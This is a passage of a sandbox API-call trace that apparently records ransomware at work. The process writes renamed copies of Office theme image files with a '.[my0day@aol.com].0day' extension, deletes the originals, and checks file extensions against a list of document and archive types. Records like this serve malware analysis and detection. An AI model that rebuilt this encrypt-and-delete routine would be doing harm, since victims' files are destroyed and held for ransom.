lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0043.505] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.505] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=33009) returned 1 [0043.505] CloseHandle (hObject=0x1d8) returned 1 [0043.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 0x20 [0043.506] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.506] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.506] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.506] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0043.506] GetLastError () returned 0x0 [0043.506] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x80f1, lpOverlapped=0x0) returned 1 [0043.508] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x8100, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x8100, lpOverlapped=0x0) returned 1 [0043.509] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0043.509] WriteFile (in: hFile=0x198, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xec, lpOverlapped=0x0) returned 1 [0043.509] SetEndOfFile (hFile=0x198) returned 1 [0043.509] CloseHandle (hObject=0x198) returned 1 [0043.509] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.509] SetEndOfFile (hFile=0x1d8) returned 1 [0043.510] CloseHandle (hObject=0x1d8) returned 1 [0043.510] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0043.510] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\bluecalm\\thmbnail.png")) returned 1 [0043.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.511] lstrlenW (lpString=".doc") returned 4 [0043.511] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.511] lstrlenW (lpString=".docx") returned 5 [0043.511] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.511] lstrlenW (lpString=".pdf") returned 4 [0043.511] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.511] lstrlenW (lpString=".xls") returned 4 [0043.511] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.511] lstrlenW (lpString=".xlsx") returned 5 [0043.511] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.511] lstrlenW (lpString=".ppt") returned 4 [0043.511] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.511] lstrlenW (lpString=".zip") returned 4 [0043.511] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.511] lstrlenW (lpString=".rar") returned 4 [0043.511] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.511] lstrlenW (lpString=".bz2") returned 4 [0043.511] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.511] lstrlenW (lpString=".7z") returned 3 [0043.511] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.511] lstrlenW (lpString=".dbf") returned 4 [0043.511] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.511] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.511] lstrlenW (lpString=".1cd") returned 4 [0043.511] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.512] lstrlenW (lpString=".jpg") returned 4 [0043.512] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.512] lstrlenW (lpString=".doc") returned 4 [0043.512] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0043.512] lstrlenW (lpString=".docx") returned 5 [0043.512] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0043.512] lstrlenW (lpString=".pdf") returned 4 [0043.512] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0043.512] lstrlenW (lpString=".xls") returned 4 [0043.512] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0043.512] lstrlenW (lpString=".xlsx") returned 5 [0043.512] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0043.512] lstrlenW (lpString=".ppt") returned 4 [0043.512] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.512] lstrlenW (lpString=".zip") returned 4 [0043.512] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0043.512] lstrlenW (lpString=".rar") returned 4 [0043.512] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0043.512] lstrlenW (lpString=".bz2") returned 4 [0043.512] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0043.512] lstrlenW (lpString=".7z") returned 3 [0043.512] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.512] lstrlenW (lpString=".dbf") returned 4 [0043.512] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.512] lstrlenW (lpString=".1cd") returned 4 [0043.512] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0043.512] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUECALM\\THMBNAIL.PNG") returned 77 [0043.512] lstrlenW (lpString=".jpg") returned 4 [0043.512] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0043.513] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0043.513] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0043.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.513] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=1925) returned 1 [0043.513] CloseHandle (hObject=0x1d8) returned 1 [0043.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 0x20 [0043.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0043.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0043.513] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.513] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0043.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0044.087] GetLastError () returned 0x0 [0044.087] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x785, lpOverlapped=0x0) returned 1 [0044.104] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x790, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0x790, lpOverlapped=0x0) returned 1 [0044.105] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.105] WriteFile (in: hFile=0x1c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.105] SetEndOfFile (hFile=0x1c4) returned 1 [0044.106] CloseHandle (hObject=0x1c4) returned 1 [0044.106] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.106] SetEndOfFile (hFile=0x1d8) returned 1 [0044.106] CloseHandle (hObject=0x1d8) returned 1 [0044.106] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.107] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\blueprnt\\preview.gif")) returned 1 [0044.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.109] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.109] lstrlenW (lpString=".doc") returned 4 [0044.110] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.110] lstrlenW (lpString=".docx") returned 5 [0044.110] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.110] lstrlenW (lpString=".pdf") returned 4 [0044.110] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.110] lstrlenW (lpString=".xls") returned 4 [0044.110] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.110] lstrlenW (lpString=".xlsx") returned 5 [0044.110] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.110] lstrlenW (lpString=".ppt") returned 4 [0044.110] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.110] lstrlenW (lpString=".zip") returned 4 [0044.110] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.110] lstrlenW (lpString=".rar") returned 4 [0044.110] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.110] lstrlenW (lpString=".bz2") returned 4 [0044.110] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.110] lstrlenW (lpString=".7z") returned 3 [0044.110] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.110] lstrlenW (lpString=".dbf") returned 4 [0044.110] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.110] lstrlenW (lpString=".1cd") returned 4 [0044.110] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.110] lstrlenW (lpString=".jpg") returned 4 [0044.110] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.110] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.110] lstrlenW (lpString=".doc") returned 4 [0044.110] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.110] lstrlenW (lpString=".docx") returned 5 [0044.110] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.110] lstrlenW (lpString=".pdf") returned 4 [0044.111] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.111] lstrlenW (lpString=".xls") returned 4 [0044.111] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.111] lstrlenW (lpString=".xlsx") returned 5 [0044.111] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.111] lstrlenW (lpString=".ppt") returned 4 [0044.111] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.111] lstrlenW (lpString=".zip") returned 4 [0044.111] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.111] lstrlenW (lpString=".rar") returned 4 [0044.111] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.111] lstrlenW (lpString=".bz2") returned 4 [0044.111] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.111] lstrlenW (lpString=".7z") returned 3 [0044.111] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.111] lstrlenW (lpString=".dbf") returned 4 [0044.111] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.111] lstrlenW (lpString=".1cd") returned 4 [0044.111] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.111] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BLUEPRNT\\PREVIEW.GIF") returned 76 [0044.111] lstrlenW (lpString=".jpg") returned 4 [0044.111] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.111] lstrcmpiW (lpString1=".GIF", lpString2=".0day") returned 1 [0044.111] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0044.111] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.112] GetFileSizeEx (in: hFile=0x1d8, lpFileSize=0x2d9ff1c | out: lpFileSize=0x2d9ff1c*=3479) returned 1 [0044.112] CloseHandle (hObject=0x1d8) returned 1 [0044.112] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 0x20 [0044.112] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0044.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d8 [0044.112] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.112] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.112] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0044.114] GetLastError () returned 0x0 [0044.114] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0xd97, lpOverlapped=0x0) returned 1 [0044.117] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xda0, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xda0, lpOverlapped=0x0) returned 1 [0044.118] ReadFile (in: hFile=0x1d8, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d9fed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2d9fed4*=0x0, lpOverlapped=0x0) returned 1 [0044.118] WriteFile (in: hFile=0x1fc, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2d9fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2d9fc9c*=0xea, lpOverlapped=0x0) returned 1 [0044.118] SetEndOfFile (hFile=0x1fc) returned 1 [0044.118] CloseHandle (hObject=0x1fc) returned 1 [0044.118] SetFilePointerEx (in: hFile=0x1d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d9fec8 | out: lpNewFilePointer=0x0) returned 1 [0044.118] SetEndOfFile (hFile=0x1d8) returned 1 [0044.119] CloseHandle (hObject=0x1d8) returned 1 [0044.119] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0044.119] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 1 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.120] lstrlenW (lpString=".doc") returned 4 [0044.120] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.120] lstrlenW (lpString=".docx") returned 5 [0044.120] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.120] lstrlenW (lpString=".pdf") returned 4 [0044.120] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.120] lstrlenW (lpString=".xls") returned 4 [0044.120] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.120] lstrlenW (lpString=".xlsx") returned 5 [0044.120] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.120] lstrlenW (lpString=".ppt") returned 4 [0044.120] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.120] lstrlenW (lpString=".zip") returned 4 [0044.120] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.120] lstrlenW (lpString=".rar") returned 4 [0044.120] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.120] lstrlenW (lpString=".bz2") returned 4 [0044.120] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.120] lstrlenW (lpString=".7z") returned 3 [0044.120] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.120] lstrlenW (lpString=".dbf") returned 4 [0044.120] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.120] lstrlenW (lpString=".1cd") returned 4 [0044.120] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.120] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.120] lstrlenW (lpString=".jpg") returned 4 [0044.120] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.121] lstrlenW (lpString=".doc") returned 4 [0044.121] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString=".docx") returned 5 [0044.121] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0044.121] lstrlenW (lpString=".pdf") returned 4 [0044.121] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".xls") returned 4 [0044.121] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".xlsx") returned 5 [0044.121] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0044.121] lstrlenW (lpString=".ppt") returned 4 [0044.121] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.121] lstrlenW (lpString=".zip") returned 4 [0044.121] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".rar") returned 4 [0044.121] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0044.121] lstrlenW (lpString=".bz2") returned 4 [0044.121] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString=".7z") returned 3 [0044.121] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.121] lstrlenW (lpString=".dbf") returned 4 [0044.121] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0044.121] lstrlenW (lpString=".1cd") returned 4 [0044.121] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0044.121] lstrlenW (lpString="C:\\Program 